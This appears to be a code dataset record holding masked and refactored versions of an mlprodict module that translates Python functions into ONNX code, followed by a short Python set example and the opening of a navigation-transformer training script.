context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-3": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp, 'cdist': 'cdist',\n 'squareform_pdist': 'squareform_pdist'}\n allow = set(\n 'abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divideequal exp floor greater invert less log matmul maximum minimum modmultiply power sign sin sinh sqrt square subtract tan tanh transpose'\n .split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-4": "<mask token>\nimport inspect\nimport ast\nfrom textwrap import dedent\nimport numpy\nfrom scipy.spatial.distance import squareform, pdist\nfrom .node_visitor_translator import CodeNodeVisitor\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\ndef squareform_pdist(X, metric='sqeuclidean', op_version=None):\n \"\"\"\n Replacements for `squareform\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_\n and `pdist\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.\n \"\"\"\n return squareform(pdist(X, metric=metric))\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp, 'cdist': 'cdist',\n 'squareform_pdist': 'squareform_pdist'}\n allow = set(\n 'abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divideequal exp floor greater invert less log matmul maximum minimum modmultiply power sign sin sinh sqrt square subtract tan tanh transpose'\n .split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-5": "\"\"\"\n@file\n@brief One class which visits a syntax tree.\n\"\"\"\nimport inspect\nimport ast\nfrom textwrap import dedent\nimport numpy\nfrom scipy.spatial.distance import squareform, pdist\nfrom .node_visitor_translator import CodeNodeVisitor\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\ndef squareform_pdist(X, metric='sqeuclidean', op_version=None):\n \"\"\"\n Replacements for `squareform\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_\n and `pdist\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.\n \"\"\"\n return squareform(pdist(X, metric=metric))\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp,\n 'cdist': 'cdist', 'squareform_pdist': 'squareform_pdist'}\n allow = set(('abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divide'\n 'equal exp floor greater invert less log matmul maximum minimum mod'\n 'multiply power sign sin sinh sqrt square subtract tan tanh transpose').split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array,\n 'py_pow': py_pow, 'py_mul': py_mul, 'py_opp': py_opp,\n 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist # delayed\n from skl2onnx.algebra.complex_functions import onnx_cdist # delayed\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError: # pragma: no cover\n # Too old version for skl2onnx.\n pass\n\n from skl2onnx.algebra import onnx_ops # delayed\n from skl2onnx.algebra.onnx_operator import OnnxOperator # delayed\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith(\"Onnx\") and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError( # pragma: no cover\n f\"Issue with {k}={v} (type={type(v)})\") from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False,\n context_cpl=None, output_names=None,\n dtype=numpy.float32,\n verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {} # pragma: no cover\n try:\n obj = compile(code, \"\", \"exec\")\n except SyntaxError as e: # pragma: no cover\n raise SyntaxError(f\"Unable to compile\\n{code}\") from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l) # pylint: disable=W0122\n return context_l[name]\n\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError( # pragma: no cover\n f\"Unable to guess code from type {type(fct)}.\")\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context,\n output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None: # pragma: no cover\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
s1 = {10, 20, 30, 60, 70, 80, 90}
s2 = set()
print(s2)
s1.add(100)
print(s1.pop())
print(10 in s1)
print(10 not in s1)
|
normal
|
{
"blob_id": "3747e45dcba548060f25bd6d6f0e0e96091ca3df",
"index": 2358,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(s2)\ns1.add(100)\nprint(s1.pop())\nprint(10 in s1)\nprint(10 not in s1)\n",
"step-3": "s1 = {10, 20, 30, 60, 70, 80, 90}\ns2 = set()\nprint(s2)\ns1.add(100)\nprint(s1.pop())\nprint(10 in s1)\nprint(10 not in s1)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import json
from jsonargparse import ArgumentParser, ActionConfigFile
import yaml
from typing import List, Dict
import glob
import os
import pathlib
import pdb
import subprocess
import copy
from io import StringIO
from collections import defaultdict
import torch
from spacy.tokenizer import Tokenizer
from spacy.lang.en import English
from einops import rearrange
import logging
from tqdm import tqdm
import matplotlib
from matplotlib import pyplot as plt
import matplotlib.patches as patches
from matplotlib import gridspec
import numpy as np
import torch.autograd.profiler as profiler
from torch.nn import functional as F
from torch.optim.lr_scheduler import StepLR
from allennlp.training.scheduler import Scheduler
from allennlp.training.learning_rate_schedulers import NoamLR
import pandas as pd
from transformer import TransformerEncoder, ResidualTransformerEncoder, image_to_tiles, tiles_to_image
from metrics import MSEMetric, AccuracyMetric, F1Metric
from language_embedders import RandomEmbedder, GloveEmbedder, BERTEmbedder
from navigation_data import NavigationDatasetReader, NavigationImageTrajectory, configure_parser
from train_language_encoder import get_free_gpu, load_data, get_vocab, LanguageTrainer, FlatLanguageTrainer
from navigation_transformer import NavigationTransformerEncoder
from train_transformer import TransformerTrainer
logger = logging.getLogger(__name__)
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self,
dataset_reader: NavigationDatasetReader,
encoder: TransformerEncoder,
optimizer: torch.optim.Optimizer,
scheduler: Scheduler,
num_epochs: int,
num_blocks: int,
device: torch.device,
checkpoint_dir: str,
num_models_to_keep: int,
generate_after_n: int,
resolution: int = 64,
patch_size: int = 8,
block_size: int = 4,
batch_size: int = 16,
output_type: str = "per-pixel",
checkpoint_every: int = 64,
validation_limit: int = 16,
depth: int = 7,
score_type: str = "acc",
best_epoch: int = -1,
seed: int = 12,
zero_weight: float = 0.05,
debug_image_top_k: int = None,
debug_image_threshold: float = None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[],
encoder=encoder,
optimizer=optimizer,
scheduler=scheduler,
num_epochs=num_epochs,
num_blocks=num_blocks,
device=device,
checkpoint_dir=checkpoint_dir,
num_models_to_keep=num_models_to_keep,
generate_after_n=generate_after_n,
score_type=score_type,
patch_size=patch_size,
block_size=block_size,
output_type=output_type,
resolution=resolution,
depth=depth,
best_epoch=best_epoch,
seed=seed,
zero_weight=zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
if debug_image_top_k < 0:
debug_image_top_k = None
if debug_image_threshold < 0:
debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i+self.batch_size]
small_batches.append(small_batch)
return small_batches
def validate_one_epoch(self, epoch, step, validation_limit):
print(f"Validating epoch {epoch} step {step}...")
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read("dev", validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, epoch, b, 0)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.read("dev", self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f"Test-time pixel acc {mean_acc * 100}")
